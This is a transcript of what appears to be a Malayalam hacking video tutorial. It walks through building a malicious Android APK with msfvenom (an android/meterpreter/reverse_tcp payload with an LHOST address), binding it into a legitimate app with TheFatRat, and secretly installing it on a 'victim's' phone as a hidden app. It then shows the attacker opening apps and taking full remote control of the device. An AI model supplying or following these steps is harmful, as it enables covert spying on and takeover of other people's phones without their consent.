നമ്മളൊരു ആപ്ലിക്കേഷൻ ഇൻസ്റ്റാൾ ചെയ്യുന്ന സമയത്തൊക്കെ ആപ്ലിക്കേഷൻ ഇങ്ങനെ ഒരു പേരുണ്ടാകും. ഈ പേരാണ് നമ്മൾ എന്ത് ചെയ്യേണ്ടത്, ഇപ്പം ഇത് റൺ ചെയ്യണം അതില്ലെങ്കിൽ സ്റ്റോപ്പ് ചെയ്യണം, ഈ നെയിമാണ് നമ്മൾ യൂസ് ചെയ്യേണ്ടത് കേട്ടോ. ഫോർ എക്സാമ്പിൾ നമുക്ക് എന്ത് ചെയ്യണം, ഏതെങ്കിലും ഒരു ആപ്ലിക്കേഷൻ അവിടെ ഓപ്പൺ ആക്കണം. ക്രോം, നമുക്ക് എന്ത് ചെയ്യാം, ഈ ഒരു ക്രോം അവിടെ ഓപ്പൺ ആക്കാം. കണ്ടോ, ക്രോം ഇപ്പോൾ അവിടെ എന്താണ്, റണ്ണിങ് ആണോ? റണ്ണിങ് അല്ല, ഫാൾസ് ആയിട്ട് കിടക്കുന്നുണ്ട്. ആപ്ലിക്കേഷൻ ഇൻസ്റ്റാൾഡ് ആണ്, പക്ഷെ അതെന്തല്ല, അവിടെ റണ്ണിങ് അല്ല. അപ്പോൾ നമുക്ക് എന്ത് ചെയ്യാം, ടാർഗറ്റിൽ അവരുടെ വിക്ടിമിൻ്റെ മൊബൈലിൽ ക്രോം ഓപ്പൺ ആക്കണം. ജസ്റ്റ് ഞാൻ ഈ ഒരു നെയിം കോപ്പി ചെയ്തു. ദെൻ ഓപ്പൺ ആക്കാനുള്ള കമാൻഡ് ആപ്പ് റൺ, ഇവിടെ കാണാൻ പറ്റും ആപ്പ് റൺ ഉണ്ട്. ടൈപ്പ് ചെയ്യുക ആപ്പ് റൺ, ആ ഫയലിൻ്റെ പേര് കൊടുത്തു. ഓക്കെ, അവിടെ എന്തായി, സ്റ്റാർട്ടഡ് എന്ന് കാണിക്കുന്നുണ്ട്. ജസ്റ്റ് നമുക്ക് എന്ത് ചെയ്യാം, ഇവിടെ വന്ന് നോക്കാം. ഓക്കെ, ഇവിടെ സ്റ്റാർട്ടഡ് ആയിട്ട് കാണിക്കുന്നുണ്ട്. ഇനി അതേപോലെ തന്നെ ആപ്പ് ലിസ്റ്റിൽ ഇനിയും ഉണ്ട് ആപ്പ് ലിസ്റ്റ്. നമുക്ക് എന്ത് ചെയ്യാം, വേറെ ഏതെങ്കിലും ഒരു ആപ്ലിക്കേഷൻ, നമ്മൾ നോർമലി യൂസ് ചെയ്യുന്ന ഏതെങ്കിലും ഒരു ആപ്ലിക്കേഷൻ, ഓക്കെ, കോണ്ടാക്ട്സ് ഒന്നെടുത്ത് നോക്കാം. ഞാൻ എന്ത് ചെയ്യുന്നു, പാത്ത് കോപ്പി ചെയ്തു. ദെൻ ഇതിവിടെ വെച്ചു, ആപ്പ് റണ്ണ്. ഓക്കെ, ഇവിടെ കണ്ടോ കോണ്ടാക്ട്സ് അവിടെ ഓപ്പൺ ആയിട്ട് വന്നു. ഓക്കെ, ഇത് പുതിയ ഇതായതുകൊണ്ട് ഇതിൽ ഫയൽസ് ഒന്നുമില്ല, കോണ്ടാക്ട്സ് ഒന്നുമില്ല. ഇപ്പോൾ ചുരുക്കി പറഞ്ഞു കഴിഞ്ഞാൽ നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റുന്നുണ്ട്, ഇവിടെ നിന്നുകൊണ്ട് അവിടെ നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റുന്നുണ്ട്, ആ ഒരു ഡിവൈസിന് നമുക്ക് കംപ്ലീറ്റ്ലി കൺട്രോൾ ചെയ്യാൻ പറ്റുന്നുണ്ട്.
ഓക്കെ, ഇനിയും ഇതിൽ ഒരുപാട് കമാൻഡ്സുകൾ ഉണ്ട് ആപ്പ് ഹെൽപ്പിൽ. എല്ലാം ഞാൻ നോക്കുന്നില്ല, ഹെൽപ്പ് അടിച്ച് നോക്കുക. ജസ്റ്റ് ഓരോന്നോരോന്ന് എന്ത് ചെയ്യാം, നിങ്ങൾ ട്രൈ ചെയ്ത് നോക്കുക. ഓക്കെ, നമുക്ക് മെസ്സേജ് അയക്കാം, ഇതുപോലെ എന്തെങ്കിലും അപ്ലിക്കേഷൻസ് നമുക്ക് അവിടെ പോയിട്ട് ഇൻസ്റ്റാൾ ചെയ്യാം. ഫുൾ ആക്ടിവിറ്റി നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റും, ഇവിടെ നിന്ന് ചെയ്യാൻ പറ്റും. MSF Venom യൂസ് ചെയ്തിട്ട് എങ്ങനെ മലീഷ്യസ് APK ഇതുപോലെ ഒറിജിനൽ അപ്ലിക്കേഷൻ്റെ ഉള്ളിലാക്കണ്ട, നിങ്ങൾക്ക് ഒരു ഫയൽ നേരിട്ട് തന്നെ അയക്കണമെന്നുണ്ടെങ്കിൽ നമുക്കത് പോസിബിൾ ആണ്. MSF Venom, ഇതാണ് ഞാൻ നേരത്തെ പറഞ്ഞ ടൂള്, -p/android meter preter /reverse_tcp. okay, then lhost 192.168.1.50 16 നമ്മളുടെ ഇങ്ങോട്ട് വരേണ്ട കണക്ഷൻ. ഈ പറഞ്ഞ കാര്യമാണ് നമ്മൾ ചെയ്യുന്നതിന് പകരം ആര് ചെയ്തത്, ഫാട്രാറ്റ് ചെയ്തത്. 54 നമ്മൾ കൊടുത്തു. ദെൻ ഞാനിത് എന്ത് ചെയ്യണം, ഔട്ട്പുട്ടായിട്ട് നമുക്കത് സ്റ്റോർ ചെയ്യണം. ജസ്റ്റ് ഞാൻ ഇവിടെ malicious.apk, കാരണം ഇത് ജസ്റ്റ് ഒരു മലീഷ്യസ് APK ആണ് എന്ന് പറഞ്ഞാൽ അവരുടെ മൊബൈൽ ഇത് ഇൻസ്റ്റാൾ ആവും. ഓക്കെ, ദെൻ നമുക്ക് കമ്പ്യൂട്ടറിലേക്ക് അത് റിവേഴ്സ് കണക്ഷൻ കൊണ്ടുവന്ന് തരും. അതിനുവേണ്ടി സിമ്പിളായിട്ട് ഞാനൊരു APK ഫയൽ ക്രിയേറ്റ് ചെയ്യുന്നതാണ് കേട്ടോ. ദെൻ വെയിറ്റ് ചെയ്യാം. ഓക്കെ, LS അടിച്ച് നോക്കുക, malicious.apk കണ്ടോ, ഒരു APK ഫയൽ ഇവിടെ ക്രിയേറ്റ് ആയി. സത്യത്തിൽ ഇതാണ് ഇതിൻ്റെ ബിഹൈൻഡിൽ നടക്കുന്നത്, ഫാട്രാറ്റിൻ്റെ ഉള്ളിൽ നടക്കുന്നത്. നമ്മൾ നേരത്തെ പറഞ്ഞ MSF Venom യൂസ് ചെയ്തിട്ട് ഒരു മലീഷ്യസ് APK ഇതാക്കണം നമ്മളിവിടെ ക്രിയേറ്റ് ചെയ്തു. ഈ APK ആണ് ഏതിൻ്റെ ഉള്ളിലേക്ക് ബൈൻഡ് ചെയ്തത്, നമ്മളുടെ ഷസം എന്ന് പറയുന്ന ആപ്ലിക്കേഷൻ്റെ ഉള്ളിലേക്ക് ബൈൻഡ് ചെയ്തിട്ട് അത് നമ്മൾ ഒരുമിച്ചായിട്ട് അയച്ചു കൊടുത്തത്. ഇനി നിങ്ങൾക്ക് അങ്ങനെ ഒറിജിനൽ ആപ്ലിക്കേഷൻ അയച്ചു കൊടുക്കണ്ട. ഈ പറയുന്ന പോലെ ആ ഫോൺ നിങ്ങളുടെ കയ്യിലേക്ക് ഒരു 5 മിനിറ്റിന് കിട്ടി. അപ്പോൾ നിങ്ങൾക്ക് എന്ത് ചെയ്യാം, ഇങ്ങനെ ഒരു മലീഷ്യസ് കോഡ് ക്രിയേറ്റ് ചെയ്തിട്ട് പെട്ടെന്ന് ഒറ്റ സ്റ്റെപ്പിൽ കഴിഞ്ഞു. ഈ ഒരൊറ്റ കമാൻഡ് റൺ ചെയ്താൽ മതി. ദെൻ ആ APK കിട്ടി. ഈ APK പോയിട്ട് അവരുടെ മൊബൈൽ ഇൻസ്റ്റാൾ ചെയ്താലും മതി. അവരുടെ ഫോണിൽ ഒരു അപ്ലിക്കേഷൻ കാണിക്കില്ല. ഓക്കെ, അത് അവിടെ ഹിഡൻ ഒരു ആപ്ലിക്കേഷനായിട്ട് അവിടെ കടന്നോളും. പക്ഷെ നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റും, അവരൊരു തവണ ഇത് ഓപ്പൺ ആക്കി കഴിഞ്ഞാൽ നമുക്ക് ഫുൾ കൺട്രോൾ, ഇത് പറഞ്ഞ പോലെ റിവേഴ്സ് നമ്മൾ എന്ത് ചെയ്യും, MSF കൺസോൾ യൂസ് ചെയ്തിട്ട് ഇതേപോലെ ബാക്കിയൊക്കെ ചെയ്യേണ്ട. ഈ മൾട്ടി ഹാൻഡ്ലറും ഇതൊക്കെ നമ്മൾ കൊടുക്കണം. MSF കൺസോളിൽ മൾട്ടി ഹാൻഡ്ലർ കൊടുക്കുക. കാരണം അതെന്തിനാണ്, നമുക്കൊരു ഇന്ററാക്ട് ചെയ്യാനൊരു ഷെല്ല് കണ്ടത് ഇപ്പോൾ ഇവിടെ നമുക്ക് ഇന്ററാക്ട് ചെയ്യാൻ പറ്റുന്നില്ലേ. അപ്പോൾ ഇന്ററാക്ട് ചെയ്യാനുള്ള ഒരു ഇന്റർഫേസ് ആണ്, ഫ്രെയിം വർക്കാണ്. അപ്പോൾ ഇത് നമ്മൾ യൂസ് ചെയ്യണം. പക്ഷേ APK ക്രിയേറ്റ് ചെയ്യാൻ നിങ്ങൾ ഒറിജിനലിൻ്റെ ഉള്ളിൽ തന്നെ കൊടുക്കണമെന്നില്ല. ഈ ഒരൊറ്റ ലൈനിലും നമുക്ക് എന്ത് ചെയ്യാം, മലീഷ്യസ് കോഡ് ഉണ്ടാക്കാം. ഇതുണ്ടാക്കാൻ വലിയ സമയമൊന്നുമില്ല. ഈ ടൂൾ എല്ലാ കമ്പ്യൂട്ടറിലും ഇൻസ്റ്റാൾഡ് ആയിരിക്കും. ഓക്കെ, ഇതാക്കണ് പെട്ടെന്ന് ഞാനൊരു APK കിട്ടി. ഈ APK എനിക്ക് എന്ത് ചെയ്യാം, പെട്ടെന്ന് തന്നെ അവരുടെ മൊബൈലിലേക്ക് ഇൻസ്റ്റാൾ ചെയ്യിപ്പിക്കാം. ഇതാ പൈത്തൺ ക്രോം ഓപ്പൺ ആക്കണം. ക്രോം അവിടെ ഓപ്പൺ ആയി. 50 malicious.apk എന്ത് ചെയ്തു, ഇവിടെ ഫയൽ ഡൗൺലോഡ് ചെയ്തു. ഓക്കെ, അത് ഇൻസ്റ്റാൾ ചെയ്യുന്ന സമയത്ത് പെർമിഷൻ ചോദിച്ചു. നമ്മൾ എന്ത് ചെയ്തു, ആ ഫയൽ ഇവിടെ ഇൻസ്റ്റാൾ കൊടുക്കുകയാണ്. ഓക്കെ, മെയിൻ ആക്ടിവിറ്റി, കാരണം നമ്മളതിന് പേരൊന്നും ഇട്ടിട്ടുണ്ടായിരുന്നില്ല, ജസ്റ്റ് ഒരു ആപ്ലിക്കേഷനാണ്. ആ ഒരു ആപ്ലിക്കേഷൻ നമ്മൾ ഇൻസ്റ്റാൾ ചെയ്താൽ പോലും നടക്കുന്നത് എന്താണ്, ഒരു മലീഷ്യസ് ആപ്ലിക്കേഷൻ ഇൻസ്റ്റാൾ ചെയ്തു. ഇനിയും നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റും, ആ ആപ്ലിക്കേഷൻ വഴി സെസം ഉപയോഗിച്ചിട്ടല്ല, ആ ആപ്ലിക്കേഷൻ യൂസ് ചെയ്തിട്ട് നമുക്ക് എന്ത് ചെയ്യാൻ പറ്റും, നമ്മുടെ ഡിവൈസിനെ കൺട്രോൾ ചെയ്യാൻ പറ്റും. മനസ്സിലാവുന്നുണ്ടല്ലോ? ഓക്കെ, അപ്പോൾ ഇത്രയേ ഉള്ളൂ ഫാട്രാറ്റ്, അതേപോലെ MSF Venom.